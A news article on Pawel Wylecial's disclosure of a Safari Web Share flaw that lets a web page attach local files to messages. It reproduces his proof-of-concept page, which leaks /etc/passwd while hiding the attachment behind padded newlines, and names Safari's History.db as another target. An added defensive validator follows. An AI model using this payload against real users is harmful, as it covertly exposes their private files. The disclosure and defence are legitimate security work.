Vulnerability in Apple Safari can be used to steal files stored on iOS or macOS


An unpatched vulnerability in Apple’s Safari web browser can allow hackers to steal files from iPhones and MacBooks

An attacker could use an unpatched vulnerability in Apple’s Safari browser to steal arbitrary files from a victim’s iPhone running iOS 13.4.1 or iOS 13.6, or from a Mac running macOS Mojave 10.14.16 or macOS Catalina 10.15.5.

Security researcher Pawel Wylecial, founder of RedTeam, discovered the vulnerability in April 2020 and reported it to the Apple security team. Apple told RedTeam that it was investigating the issue, but that it would not ship a fix until 2021. Although Apple asked Wylecial not to disclose the vulnerability until it was patched, the Poland-based researcher decided that Apple was taking too long to address it and published his report on 24 August 2020.

“Apple replied asking not to publish the details as they plan to address the issue in the Spring 2021 security update,” writes Wylecial in his blog post.

The vulnerability is not trivial to exploit: it requires convincing the victim to visit a malicious website and then interact with it. Wylecial says this is feasible, however, given the payoff of stealing files from an iPhone or MacBook user.

Wylecial says the flaw lies in how the Web Share API in Safari lets users share links with third-party apps such as Mail or Messages.

“The problem is that file: scheme is allowed and when a website points to such a URL unexpected behavior occurs. In case such a link is passed to the navigator.share function an actual file from the user file system is included in the shared message which leads to local file disclosure when a user is sharing it unknowingly,” says Wylecial.

To demonstrate the vulnerability, Wylecial built a fake website containing a single image of a kitten and a button urging visitors to share the image with their friends. When the victim opens the page in Safari on an iPhone or MacBook and presses the share button, the system share sheet asks which app to use, such as Mail or Messages. If the victim chooses Mail, the attacker’s script adds not only the image URL but also an arbitrary file from the victim’s device as an attachment to the outgoing message.

Proof-of-concept:

Wylecial published the following proof-of-concept code on his website:

<html>
<script>
// Share payload: the visible text ends with a long run of newlines so that
// the attachment lands below the fold in Mail, and the url points at a local
// file instead of a web resource.
var opts = {text: 'check out this cute kitten! http://somerandomimagewebsite.com/cat.jpg\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n', url: 'file:///etc/passwd'};
function run() {
  // Safari resolves the file: URL and attaches the file to the shared message.
  navigator.share(opts);
}
</script>
<body>
Check out this cute kitten!
<br/>
<img width="200px" height="200px" src="cat.jpg">
<br/>
<button onclick='run();'>share it with friends!</button>
</body>
</html>

He has also published a video showing how the vulnerability is exploited.

The PoC steals the local passwd file, but Wylecial notes that changing the url to a single other path lets an attacker exfiltrate the victim’s entire Safari browsing history from an iPhone:

file:///private/var/mobile/Library/Safari/History.db

What makes the vulnerability worse is that the Mail app on both iOS and macOS does not show the attached file unless the victim scrolls to the bottom of the message. Wylecial says he tested the PoC on iPhones running iOS 13.4.1 and 13.6, and on MacBooks running macOS Mojave 10.14.16 with Safari 13.1 and macOS Catalina 10.15.5 with Safari 13.1.1.
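The check Safari was missing, as an added example (this is not code from Wylecial’s PoC or from WebKit): a JavaScript wrapper that validates a Web Share payload before handing it to navigator.share(). It resolves the url against the page’s base URL, allows only http and https, and refuses text padded with the long run of newlines the PoC uses to hide the attachment. The scheme allow-list, the newline threshold, the function names and the example URLs are this example’s own assumptions, not Apple’s actual fix.

```javascript
// Added example, not code from Wylecial's PoC or from WebKit: a defensive
// wrapper around navigator.share() that models the scheme check Safari lacked.
// The allow-list, the newline threshold and the function names are this
// example's own choices (assumptions), not Apple's fix.

const ALLOWED_SCHEMES = new Set(["http:", "https:"]);
// Longer runs of newlines look like the PoC's push-the-attachment-out-of-view padding.
const MAX_NEWLINE_RUN = 3;

// Validate a ShareData-like object ({ title, text, url }) before it reaches
// the share sheet. `baseUrl` stands in for the document's base URL, which the
// Web Share API uses to resolve a relative `url`; resolving first matters,
// because a relative "cat.jpg" on a file:// page resolves to a file:// URL.
// Returns { ok: true, data } with a normalised copy, or { ok: false, reason }.
function validateShareData(data, baseUrl) {
  if (data === null || typeof data !== "object") {
    return { ok: false, reason: "share data must be an object" };
  }
  const out = {};

  if (data.url !== undefined) {
    let parsed;
    try {
      parsed = new URL(String(data.url), baseUrl);
    } catch (err) {
      return { ok: false, reason: "url is not a valid absolute or base-relative URL" };
    }
    if (!ALLOWED_SCHEMES.has(parsed.protocol)) {
      // This is the branch the PoC relies on: file:///etc/passwd is rejected here.
      return { ok: false, reason: `url scheme not allowed: ${parsed.protocol}` };
    }
    out.url = parsed.href;
  }

  for (const field of ["title", "text"]) {
    if (data[field] === undefined) continue;
    const value = String(data[field]);
    const runs = value.match(/\n+/g) || [];
    const longest = runs.reduce((m, r) => Math.max(m, r.length), 0);
    if (longest > MAX_NEWLINE_RUN) {
      return { ok: false, reason: `${field} contains a run of ${longest} newlines` };
    }
    out[field] = value;
  }

  if (Object.keys(out).length === 0) {
    return { ok: false, reason: "nothing to share" };
  }
  return { ok: true, data: out };
}

// Drop-in replacement for navigator.share() that refuses unsafe payloads.
// Outside a browser there is no navigator, so the promise rejects instead.
function safeShare(data) {
  const base = typeof document !== "undefined" ? document.baseURI : undefined;
  const verdict = validateShareData(data, base);
  if (!verdict.ok) {
    return Promise.reject(new TypeError(`refusing to share: ${verdict.reason}`));
  }
  if (typeof navigator === "undefined" || typeof navigator.share !== "function") {
    return Promise.reject(new Error("Web Share API not available"));
  }
  return navigator.share(verdict.data);
}

// A payload shaped like the PoC above (constructed here; the newline count is
// only approximately the PoC's), for comparison.
const POC_OPTS = {
  text: "check out this cute kitten! http://somerandomimagewebsite.com/cat.jpg" + "\n".repeat(38),
  url: "file:///etc/passwd",
};
```

In a page, replace a direct navigator.share(opts) call with safeShare(opts); under Node, validateShareData() can be exercised on its own. Note that the url is resolved before the scheme is inspected: a bare "cat.jpg" is harmless on an https page but becomes a file: URL when the page itself was opened from disk.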

The source code of Wylecial’s PoC website is published on his site.
